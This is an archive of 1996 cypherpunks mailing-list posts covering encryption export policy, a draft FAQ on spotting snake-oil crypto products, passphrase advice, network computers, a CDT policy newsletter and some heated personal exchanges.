 > says what I claim, not your revisionist rewriting above.

The original sentence was...

  "While limiting the "horizons" of persons in their middle to
   late teens is often justified by arguments about
   developmental stages, the truth is that it is simply an
   attempt by their keepers to control how they think and to
   what views, mostly political and social in nature, they are
   exposed."

Seems quite clear to me.

 > As usual with the intellectually bankrupt, calling names
 > such as "Statist" is "the last resort of the scoundrel".

 > Plonk!

Fortunately, there is no need to "Plonk" you David, because the
time required to hit "delete" on your messages is an
infinitesimal fraction of the time you waste writing them, and
like most trained animals, you do occasionally manage to do
something that amuses, even if it is only relieving yourself on
stage. :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 22 Jul 1996 03:00:50 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Netscape
In-Reply-To: <Pine.LNX.3.94.960720230708.401B-100000@gak>
Message-ID: <199607211646.MAA10093@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Mark M." writes:
> > Why not consider what the consequences will be?  Do you seriously
> > believe that this will make the government stop enforcing ITAR?
> 
> The government has yet to enforce ITAR.

You are misinformed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 22 Jul 1996 06:14:33 +0800
To: cypherpunks@toad.com
Subject: NCs (network computers)
Message-ID: <199607211953.MAA22885@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I thought this was a great message on the future "network computers"
that may be coming out soon. a balanced view that shows how there
may be a niche, and that there are also places where they will
not be appropriate. the NCs could really potentially change the
computer and cyberspace as we know it in a very significant way.

------- Forwarded Message


From: JimBurd@aol.com
Date: Fri, 19 Jul 1996 07:59:03 -0400
Subject: Re: NC

When the idea of the NC was first floated, I thought to myself what an
absolutely terrible idea it was.  But as time goes on, and I read more about
the concept, I'm beginning to see that it has certain advantages.  These
advantages are going to be useful in two areas: corporate sites, and
non-technical households.  (Note: This does *not* necessarily mean that the
NC is going to be a success ;)

In a corporate environment, where many people in many different departments
have PCs on their desk, the IS dept has their hands full trying to keep these
machines running.  (I know, I've seen it first hand.)  People do *not* leave
their machines in the configurations that IS delivered to their desk.  People
bring in software from outside the company (games, personal software, etc.),
this leaves a gaping security hole (for viruses, etc.).  As people change
their machines around, it is difficult to 'borrow' someone else's machine
because it can be configured radically different from what you're used to
seeing on your desk.

The NC would reduce the per set cost of each desktop (nothing to sniff at).
 The software that runs the NC would be completely under the control of IS.
 So every machine looks the same and runs the same.  There would be a single
central point for virus checking, etc.  It would also eliminate a *lot* (or
all?) of the piracy issues that lurk in the background; you can make sure you
have a license for every piece of software that is being used.  It makes
backing up everyone's data a *lot* simpler; it's all in one place.

Now, the NC is *not* going to fly if IS tries to put it on *every* desktop.
 The computer geeks (software & hardware) are going to scream bloody murder
if IS tries.  But then, these users generally know enough (or more than IS)
to maintain their own machines.  The NC is going to be most useful for
secretaries (oops, I mean exectuive assistants), accounting, production
personel, etc.

It is this *potential* that is going to help sell the NC early on.  Whether
or not the software companies come through with products to help the NC work
is going to be crucial.  How *well* the whole thing works is also going to be
crucial.  Also, let's not forget about the need for a backup server.  If the
server (or the network) go down, the whole company can grind to a halt.
 Planning for this eventuality is going to be very important.

In the home market, the NC is going to be targeted at people like my mother
or my grandparents.  Last time I saw my grandparents (about a year ago), my
grandmother asked me about all those 'funny letters' at the bottom of the
screen on so many TV shows.  She was talking about the web URLs being
displayed.  I told her what it was about, and she asked if there was really
anything there worth seeing.  (I had to tell her the truth -- not really.)  

Anyway, the point is this: There people are *not* going to buy a PC.  They
know that they are expensive and can be very difficult & expensive to keep
running.  An NC offers the possibility (let's see if it can come true) of a
relatively low cost and simple use.  The software can be provided/maintained
by the local service provider.  Whether this is AOL, MSN, or an ISP is
probably still up in the air, and there is no reason that they can't all
co-exist.

Also, imagine the current headaches of the ISP trying to help a customer get
connected when something is wrong.  Is it hardware?  Software?  IRQ conflict?
 There is so *much* that can go wrong.  Imagine if the person calling has
*no* technical background.  Arrgh!  Now, imagine that the person calling has
an NC.  They run *standard* software and connect to the ISP.  It has the
potential to be *much*much* simpler.  (Again, we must wait and see if the
potential pans out.)

Now whether or not you 'rent' software, I don't know.  I can see a sizeable
market for this in games perhaps (like Nintendo, today).  You know, try it
before you buy it.  I do *not* think anyone in the home is going to run
Quicken on an NC; but in the corporate environment, this type of centralized
record keeping makes a lot of sense.  No more trying to back up the hard disk
on everyone's desk.


Anyway, that's my 2 cents worth.  I look forward to looking back in 5 years
to see how the whole thing panned out (or bombed!).

Jim :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Mon, 22 Jul 1996 06:36:20 +0800
To: "'WlkngOwl@unix.asb.com>
Subject: FW: A Snake-Oil FAQ
Message-ID: <01BB7706.E2DA7F60@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain



I've made some comments below.
Some deletions are marked with <<double brackets>> and insertions in 
[square brackets].
Other comments preceded with >>.
thx for looking over the comments.
g.
----------
From: 	Deranged Mutant[SMTP:WlkngOwl@unix.asb.com]
Sent: 	Saturday, July 20, 1996 9:37 AM
To: 	cypherpunks@toad.com
Subject: 	A Snake-Oil FAQ


I've written a short "Snake Oil FAQ" below.  It's incomplete and
needs some work (adding a few definitions, rewording, aesthetic
formatting, etc.), so think of it as a 'beta' FAQ (please don't post
it on web pages, though I don't mind if it's distributed among
anyone interested in criticizing or contributing).   Comments and
suggestions would be appreciated.   Note that the aim is to write
something  accessible to 'newbies'.  (Jeremy Barrett contributed to
this, BTW)


                          Snake-Oil Warning Signs
                        Encryption Software to Avoid

                              (Revision 0.1)


Introduction

======================================================================
Good cryptography is an excellent and necessary tool for almost
anyone.
However, there are a multitude of choices for what products to use.
Many good cryptographic products are available, both commercial and free. 
 However there are also some extremely bad cryptographic
products (known in the field as "Snake Oil"), which not only fail do
their job of providing security, but are based on, and add to, the many 
misconceptions and misunderstandings surrounding cryptogra
phy and security.

It is extremely important that users of cryptography actively
question the product they are considering using, to insure the security and 
integrity of their data-- be it personal or business informat
ion.  In order to make a more informed decision, it is necessary to
understand
some of the "red flags" to watch out for, and what they mean.

For a variety of reasons, this document is general in scope and does
not mention specific products or algorithms as being "good" or "Snake Oil".

Some Common Snake-Oil Warning Signs

======================================================================
The following are some of the "red flags" one should watch for when
looking at an encryption product:

Technobabble
------------
The vendor's descrption of the product may contain a lot of
hard-to-follow use of technical terms to describe how the product
works.  If this appears to be confusing nonsesense, it may very well
be (even to someone familiar with the terminology).  Technobabble is
a
good means of confusing a potential user and masking the fact that
the
vendor doesn't understand anything either.

A sign of technobabble is a descrption which drops a lot of technical
terms for how the system works without actually explaining how it
works.

>> Additionally you will see terms that are
* specially coined to sound as if they mean something
* used in a way that the profession generally doesn't do.
Check for other references to the "technologies" referred to, and if you 
find nothing in any literature (even by doing a not search) then you should 
be suspect.
Examples include:


New Type of Cryptography?
-------------------------
Beware of any vendor who claims to have invented a "new type of
cryptography".

>> Or "new breakthroughs"; extremely smart people have been working on 
modern cryptographic systems for decades; the chances of someone reputable 
coming up with a viable "revolutionary, breakthrough" cryptosystem without 
exhaustive peer review and analysis are about zero.

Avoid software which claims to use 'new paradigms' of computing such
as cellular automata, neural nets, genetic algorithms, chaos theory,
etc.  Just because software uses to different mehtod of computation
doesn't make it more secure.

Anything that claims to have invented a new <<public key>> cryptosystem
without publishing the details or underlying mathematical principles
is highly suspect.

>> any cryptosystem, no?

Proprietary Algorithms
----------------------
Avoid software which uses "proprietary" or "secret" algorithms.
Security through obscurity is not considered a safe means of
protecting your data.  If the vendor does not feel confident that the
method used can withstand years of scrutiny by the academic
community,
neither should you.

Beware of specially modified versions of well-known algorithms.  This
may unintentionally weaken the cipher.

The use of a trusted algorithm, along with technical notes explaining
the implementation (if not availablity of the source code for the
product) are a sign of good faith on the part of the vendor that you
can take apart and test the implementation yourself.


Old Ciphers Never Die...
------------------------
Beware of something that sounds like a sophisticated nineteenth-
century or even World War II scheme, or something based on a
mechanical system.

>> Note: the newbie won't know what those are.  Descriptions of Vernam, 
Enigma, etc. would be a Good Thing here, or pointers to descriptions.  I am 
not qualified to describe them adequately here, but the FAQ should somehow 
clarify this.

If the product's authors sound like they are entirely unfamiliar
with the state of the art, that's a good warning sign.

>> How would that be manifest?  See above comment about invented or misused 
terms.  Maybe you could say: if a program's author cannot explain the 
historical precedents of his technology ("it's a substitution/permutation 
network..." or "it's a system relying on solving the discrete log problem 
in GF(9999999)" .... etc." then it's probably bogus.

Experienced Security Experts
----------------------------
Beware of any product claiming that "experienced security experts"
have analyzed it, but it won't say who (especially if the scheme has
not been published in a reputable journal).

Unbreakability
--------------
Some vendors will claim their software is "unbreakable".  This is
marketing hype, and a common sign of snake-oil. Avoid any vendor that
makes unrealistic claims.

No algorithm is unbreakable.  Even the best algorithms are breakable
using "brute force" (trying every possible key), but if the key size
is large enough, this is impractical even with vast amounts of
computing power.

Be wary of marketing gimmicks related to "if you can crack our
software" contests.

>> Other comments on cpunks have addressed this.  Here's how it could be 
caveat-ed: Any such contest which seems to be OVERSTATED (e.g. "I'll give 
you the keys to the company ...") in relation to the size, maturity, and 
reputability of the offering entity (company or individual) is to be 
suspect.  Netscape offering tee-shirts and such for breaking a system is 
one thing.  Someone you have never heard of offering his entire company is 
something else.  I think there will necessarily be some fuzziness here.

One-Time-Pads
-------------
A snake-oil vendor may claim the system uses a one-time-pad (OTP),
which, when implemented ABSOLUTELY CORRECTLY, is unbreakable.

A OTP system is not an algorithm.  It involves generating a random
key
at least the size of the message and garbling the message with it.
When the message is decrypted, the key is destroyed.  Only one
message
is encrypted with a OTP, and it is used only once.  They key is
random: generated using a real random source, such as specialized
hardware, radioctive decay timings, etc., and not from an algorithm
or
cipher.  Anything else is not a one-time-pad.

The vendor may [perhaps deliberately] confuse random session keys or 
initialization vectors
with OTPs.

>> The vendor may try to capitalize on the well-known unbreakability 
property of (properly used) OTP's and try to call whatever it is he is 
offering an OTP.  Any variation from the fundamental rules of what an OTP 
is makes the claim bogus.  Any vendor who tries to pass off his invention 
as OTP when it is not has, by definition, reduced his credibility to 
dangerously low levels.

Algorithm or product XXX is insecure
------------------------------------
Avoid anything that makes claims that particular algorithms or
other products are insecure without backing up those claims (or at
least <<siting>> [citing] references to them).

Avoid anything that misrepresents 'weaknesses' of other algorithms.
(For example, if the product claims it doesn't use public key crypto,
citing timing attacks or factoring as reasons.)

>> Maybe some elaboration: the reputable cryptosystems in use today are all 
subject to various attacks with various levels of vulnerability.  A vendor 
claiming this as some fatal flaw in those systems making them unusable also 
demonstrates that the vendor has no credibility.  The reality is that these 
reuptable systems are and can be engineered to provide required security 
levels depending on the value of the data and the costs of mounting the 
attacks, and these parameters are known and understood.  How?  By years of 
academic research and analysis by the best minds in the field.  Someone 
coming along and claiming new earthshattering weaknesses in those 
cryptosystems, who has not presented those findings to the crypto research 
community in the appropriate forums and had them subject to rigorous 
examination, is a fool and/or not to be trusted.  This is a corollary to 
the warnings about claims of "new revolutionary" cryptosystems; it is just 
as fatal to credibility to claim that a trusted system is weak.

Keys and Passwords
------------------
The "key" and the "password" are often not the same thing.  The "key"
generally refers to the actual data used by the cipher algorithm.  The 
"password" refers to the word or phrase the user types in,
 which the software converts into the key (usually through a process
called "hashing" or "key initialization").

The reason this is done is because the characters a user is likely to
type in do not cover the full range of possible characters. (Such keys 
would be more redundant and easier for an attacker to gues
s.)  By hashing a key can be made from an arbitrary password that
covers the full range of possible keys.  It also allows one to use longer 
words, or phrases and whole sentences as a "passphrase", wh
ich is more secure.

Anything that restricts users passwords to something like 10 or 16 or
even 32 characters is foolish.  If the actual "password" is the cipher's 
key (rather than hashing it into a key, as explained abo
ve), avoid it.

Anything that claims to solve the "key management problem" is also
be to avoided.  (Key management is an inherent problem with crypto.)
Convenience is nice, but be wary of anything that sounds too easy
to use.  Avoid anything that lets anyone with your copy of the
software to access files, data, etc. without having to use some sort of key
or passphrase.

Avoid anything that doesn't let you generate your own keys (ie,
the vendor sends you a key in the mail).

Avoid anything by a vendor who does not seem to understand the
difference between public-key cryptography and private-key cryptography.

>> Again, how is the newbie to be helped detect this ??  Hmmm.

Lost keys and passwords
-----------------------
If there's a third-party utility that can crack the software, avoid
it.  If the vendor claims it can recover lost passwords (without
using a key-backup or escrow feature), avoid it.

Exported from the USA
---------------------
If the software is made in North America, can it be exported?  If the
answer is yes, chances are it's not very strong.  Strong cryptography
is considered munitions in terms of export from the United States,
and
requires approval from the State Department.  Chances are if the
software is exportable, the algorithm is weak or it is crackable (hence it 
was approved for export).

If the vendor is unaware of export restrictions, avoid the software:
the vendor is not familiar with the state of the art.

Because of export restrictions, some legitimate (not-Snake Oil)
products may have a freely exportable version for outside of the USA, which 
is different from a separate US/Canada-only distribution.



---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Mon, 22 Jul 1996 04:41:05 +0800
To: Jerome Tan <cypherpunks@toad.com
Subject: Re: Firewall Penetration
Message-ID: <2.2.32.19960721182353.006f5238@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:29 PM 7/19/96 +0800, you wrote:
>Is it possible to penetrate a firewall?
>

-----BEGIN PGP SIGNED MESSAGE-----

Without professional knowledge of firewalls, a simple and true
answer is obvious.  Of course they are penetrable; that's what
they are for.  They permit users to penetrate, while attempting
to keep out intruders.  If it were impossible to penetrate
firewalls, then they would pretty much be useless to those with
authorized access.  How could they get in themselves?

Maybe 'feasibility' is the question.  That answer would depend
on some variables on the intruder's end.  If permissions and
rights are allocated to regular users with authorization, then
an intruder with adequate resources, knowledge, time, etc.
should be able to get in.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMfJ1H3ychImXHmeJAQH5XQf8DtJ+6W+NZGqm9Af9QVBzz73TbmJVqYB5
dZstXkk8tEyRd1LTG5hgIfXH8qKMl0a5tXoEdu72/UXbIvTyJapXcRgMZ0EctKJl
hzfSvAGwNPzy5VUubUMOzsl4BId09KfB1+cpffAWa1rCyGsf6UOC7dftGLTlPVaf
M1DG1pt1ruxLhc8hLdso86gP+q68sEBDFykIRCI0z6kTZj/U1W0MHtFLxkR1rkqX
R/VqZ5LrvhRKYXVUD8iHMyPdyvvLDstddC3NcOf9mMDGqYp1LOGTJAKYT4mxhkEy
2ABfAISU+c4USl4C01RmgXni6gKDceWKHeTUvsBHAR6EUmUHso8Jng==
=PVGa
-----END PGP SIGNATURE-----
vagab0nd@sd.cybernex.net
http://ww2.sd.cybernex.net/~vagab0nd/index.html
Visit web page for public key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 22 Jul 1996 03:20:44 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: ABC news on Internet Telephony
In-Reply-To: <199607210632.XAA16792@mail.pacifier.com>
Message-ID: <199607211825.NAA20257@homeport.org>
MIME-Version: 1.0
Content-Type: text


	The internet can't get that much capacity, we don't have
swiutching technology beyond the test phase to handle gigabits of data
per second, and we don't have the routing technology to move packets
from point A to points B-ZZZ when searching through a routing table
hundreds of thousands of lines long that never has a chance to
stabalize between the change messages that keep coming in.

	If you're interested, search for the writings of Noel Chiappa,
who talks about this regularly on ietf, big-internet, etc.

Adam

jim bell wrote:
| 
| Potentially.  However, there has been some mention of a new standard for 
| voice compression that puts voice into 2400 bits per second, a factor of 
| about 25 lower than the phone company normally uses. (They use 8,000 samples 
| per second at 8 bits per sample, companded.)  At that rate, a pair of 
| modern, 2.4 Gb/s fibers could handle 1 million simultaneous phone calls.  
| Since some of the newer fiber systems put 8 or more separate channels down a 
| single fiber, that would work out to 8 million conversations.
| 
| I have to conclude that we shouldn't even be close to running out of 
| Internet capacity, _IF_ it were driven by state-of-the-art fiber and 
| similar-speed switches.  But it probably isn't.  At best, Internet probably 
| only gets a fraction of the capacity of a given fiber wherever it flows.  
| This will have to change.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 22 Jul 1996 03:46:44 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <199607210701.AAA00292@netcom10.netcom.com>
Message-ID: <v03007609ae181b3351ac@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:41 AM -0400 7/21/96, David Sternlight wrote:
> Plonk!

<sigh..>

<Plonk!>, yourself...

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 22 Jul 1996 03:56:28 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Netscape
In-Reply-To: <199607210918.FAA14603@quasar.voicenet.com>
Message-ID: <Pine.LNX.3.94.960721133654.212A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 21 Jul 1996, Bill Stewart wrote:

> First of all, the goverrnment _has_ enforced ITAR; I've seen references
> (ummm, on the net...) to a few cases of things like exporting TV decryptors,
> as well as all the enforcement about illegal trafficking in guns and such.

I haven't heard of anyone ever being indicted for exporting cryptography.  I
should have made it clear that I was refering to ITAR as it applies to crypto,
and not other items that would fall under ITAR.

> But second, if you're threatened with jail and large fines, and have
> to pay your lawyers lots of money to avoid being railroaded,
> that's enforcement even if it's not the full-scale due process type.

Quite true.  I was just refering to someone actually being tried and found
guilty of violating ITAR by exporting cryptography.  I'd be very interested in
any references to companies or individuals being prosecuted for exporting
crypto.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMfJsOrZc+sv5siulAQHs1wP7BVKtK4HLcNR3oEAPL1k/5zCYVRy7q7wu
gQZqsM+lwKkIGnPuhu16+Cp/AIyMfokuW4y2qyJ9vOQiS7+ikVgwPB2neB0PmpXM
mpBMjOXhWPoqVS8jOxC85/lutsf7TZpxEDgV9eev2iyY/v4c5/BZJD7onN/qJYVV
P9gOv+Oyki8=
=NpZS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Mon, 22 Jul 1996 05:32:26 +0800
To: cypherpunks@toad.com
Subject: Re: Length of passphrase beneficial?
Message-ID: <2.2.32.19960721190841.0069e654@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:51 PM 7/21/96 -0400, you wrote:
>
>Erle Greer writes:
>> I have a 2048-bit PgP key and pseudorandom a/n character
>> generator, from which I chose a large passphrase similar to:
>> 
>> f4VnI1G1mGcwTZ1vGoyPwN4NLojF8Ee9ff1aicOGn87x0nwwHhJUo6XSYKEawRne
>> (Yes, cut-n-paste, but my only in-house threat is my wife.)
>> 
>> Actual Question:
>> Does the length and randomness of a passphrase contribute at all
>> to the overall security of a cryptosystem?
>
>The passphrase only does one thing for you, which is protect your
>keyring in case someone gets it. Since you keep the passphrase on
>line, you are actually less secure than if you used a memorable
>phrase.
>
>BTW, since the passphrase is used to hash into an IDEA key, more than
>128 bits of input entropy would be wasted.
>
>Perry
>
Good point.  Another bad thing about keeping the passphrase on-line is
that I would have to trasport the passphrase on floppy if I required
portability.  Depending on how important my information may be, I
could possible be carrying my whole life on a floppy.  I see now that
it is better to just memorize a phrase.

Thanks!
vagab0nd@sd.cybernex.net
http://ww2.sd.cybernex.net/~vagab0nd/index.html
Visit web page for public key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Palacios <editor@cdt.org>
Date: Mon, 22 Jul 1996 04:40:35 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.28 - FBI Director to Testify at Senate Crypto Hearing; Join Cybercast of Hearing
Message-ID: <31F2731F.56C4@cdt.org>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 28
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 28                        July 21, 1996

 CONTENTS: (1) FBI Director to Testify at Senate Crypto Hearing; Netizens Can
               Participate in Hearing Live Online
           (2) How Will the Cybercast Work?
           (3) Submit Your Comments for the Hearing Record
           (4) How to Subscribe/Unsubscribe
           (5) About CDT, contacting us

  ** This document may be redistributed freely with this banner intact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
         ** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) FBI Director to Testify at Senate Crypto Hearing; Netizens can 
    Participate in Hearing Live Online, Submit Testimony for the Record

On Thursday July 25 the Full Senate Commerce Committee will hold a hearing
to consider S. 1726, the 'Pro-CODE' bill designed to relax export controls
on encryption.  FBI Director Louis Freeh and other high-ranking
Administration officials are scheduled to testify. A second panel of
computer industry leaders, including Netscape CEO Jim Barksdale and others,
will also give testimony for the committee.

In an effort to ensure that concerned Internet users can participate in
this important policy debate, the Senate Commerce Committee has arranged
with CDT, VTW, HotWired, and DIGEX to bring the hearing live online.
Netizens will also be able to submit testimony for the record.  Details on
the cybercast can be found below, or by visiting:

      http://www.crypto.com/events/072596/

This full committee hearing represents another important step forward
towards passage of legislation designed to make encryption more widely
available to computer users.

Sponsored by Sen. Conrad Burns (R-MT), Sen. Patrick Leahy (D-VT), Senate 
Commerce Committee Chairman Larry Pressler (R-SD), Sen. Ron Wyden (D-OR), 
Senate Majority Leader Trent Lott (R-MS), Sen. Barbara Boxer (D-CA), and 
others, the Pro-CODE bill is designed to encourage the widespread 
availability of strong privacy and security technologies for the Internet.
The bill was the subject of two hearings held on June 12 and June 26 before
the Senate Commerce Subcommittee on Science, Space, and Technology.  The 
June 26th hearing was the first Congressional hearing ever to be cybercast
live on the Internet. (Details about that cybercast can be found at 
http://www.crypto.com/events/062696/).

For more information, including the latest list of witnesses scheduled to
testify at the July 25th hearing, background on the Pro-CODE bill, and
other encryption issues, visit:

Cybercast Information:  -   http://www.crypto.com/events/072596/
                        -   http://www.hotwired.com/wiredside/

Background on the Encryption Debate:

The Encryption Policy Resource Page         - http://www.crypto.com/
The Internet Privacy Coalition              - http://www.privacy.org/ipc/
Center for Democracy and Technology (CDT)   - http://www.cdt.org/crypto/
Electronic Frontier Foundation (EFF)        - http://www.eff.org/
Electronic Privacy Information Center (EPIC)- http://epic.org/
Voters Telecommunications Watch (VTW)       - http://www.vtw.org/
________________________________________________________________________

(2) HOW WILL THE CYBERCAST WORK?

The Cybercast has several components which combine to provide a unique
opportunity for Netizens to participate in the democratic process and to
encourage communication between Members of Congress and the Internet
Community on critical Internet policy issues:

    * Live Audio Simulcast: Using RealAudio software, the audio portion of
      the hearing will be available live online. Audio transcripts of the
      hearing will also be archived online.

    * Simultaneous Interactive Discussion Forum: During the hearing, Senate
      Commerce Committee Staff and a representative of CDT will participate 
      in an interactive "chat room" from inside the hearing room. Anyone 
      with a telnet application can join the chat room, ask questions of 
      the Senate staff, and discuss the issues with fellow Netizens. 
      Participants will also have an opportunity to provide questions to 
      the Committee Chairman to ask of the Witnesses.

    * Still Video Images: Video images from inside the hearing room will be
      uploaded to http://www.crypto.com/events/072596/ throughout the 
      course of the hearing.

HOW TO JOIN THE HEARING LIVE ONLINE

     On Thursday July 25 at 9:30am EDT (6:30am PDT/1330 GMT), point your
     web browser to:

          http://www.crypto.com/events/072596/

     The Audio URL will be posted here, along with live pictures from the
     Hearing and a link to the online discussion forum.

     Additional information is also available at:
          http://www.hotwired.com/wiredside/

     WHAT YOU WILL NEED TO PARTICIPATE:

      * RealAudio (available free at http://www.realaudio.com/)
      * Membership at HotWired (Membership is free. Visit
         http://www.hotwired.com/ for details.)
      * A World Wide Web Browser
      * A Telnet Application

________________________________________________________________________

(3) TELL CONGRESS WHY ENCRYPTION IS IMPORTANT TO YOU - ADD YOUR VOICE TO THE
    CONGRESSIONAL RECORD

Just like the previous hearing, you will be able to submit testimony online
for inclusion in the Committee Record.  Please be sure to visit
http://www.crypto.com/ and add your voice to the debate over encryption 
policy on Capitol Hill.  Responses will be tabulated and the results, along
with selected statements, will be included in the Committee Record by 
Senator Larry Pressler.

To add your voice to the crypto debate in Congress, visit:

   http://www.crypto.com/events/072596/

------------------------------------------------------------------------

(4) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
nearly 10,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------

(5) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.28                                            7/21/96
-----------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 22 Jul 1996 05:42:20 +0800
To: david@sternlight.com (David Sternlight)
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <v0300760bae180a1cf342@[192.187.162.15]>
Message-ID: <199607211915.OAA17048@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


David Sternlight wrote:
> 
> "Your honor, I don't know who flushed it. I have many visitors to my home."
> is rather different than being caught with a large stash of cocaine on your
> night table.

It is not surprising that after the society decided to label 
natural economic activities (drug dealing) as crimes, it has 
to resort to unnatural methods of enforcing the unnatural
legislation.

Drug consumption (just as alcohol consumption) may be bad for the
individual consumers. But it is a matter of individual informed choice.
If the government (or society, to be more exact) decides to take away a
natural right to consume whatever one pleases, it has no choice but to
go farther and to take away more rights, for example rights to privacy
and safety in their own homes.

The problem is not the drug dealers (and not alcohol traffickers in
the thirties), the problem is lack of respect for the freedom of 
individual consumers, which transforms itself into abolition of other
rights.

Here's what milton friedman said: ``restrictions on economic freedom
inevitably affect freedom in general'' (Free to Choose). It's basically
right. It is the same as the wisdom that bad deeds that one commits
inevitably lead to more bad deeds.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 22 Jul 1996 07:42:27 +0800
To: Bob Palacios <cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.28 - FBI Director to Testify at Senate Crypto Hearing
Message-ID: <199607212127.OAA10799@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:12 PM 7/21/96 -0400, Bob Palacios wrote:
>   The Center for Democracy and Technology  /____/     Volume 2, Number 28
 POLICY POST Volume 2, Number 28                        July 21, 1996
> CONTENTS: (1) FBI Director to Testify at Senate Crypto Hearing; Netizens Can
>               Participate in Hearing Live Online
>In an effort to ensure that concerned Internet users can participate in
>this important policy debate,

If there is anything worth complaining about, it is that there simply hasn't 
been a "debate" in this "important policy debate."  The pro-GAK few have 
consistently avoided appearing in a format in which a genuine debate can 
occur.  And I don't mean a question-and-answer scenario either, whether the 
questions are asked by Congress or the news media.  I'm talking about a REAL 
debate, one where the pro-GAK's can be seen to _lose_ by being torn to pieces.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 22 Jul 1996 05:40:39 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape download requirements
In-Reply-To: <Pine.LNX.3.93.960721112708.2945C-100000@smoke.suba.com>
Message-ID: <33iFRD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


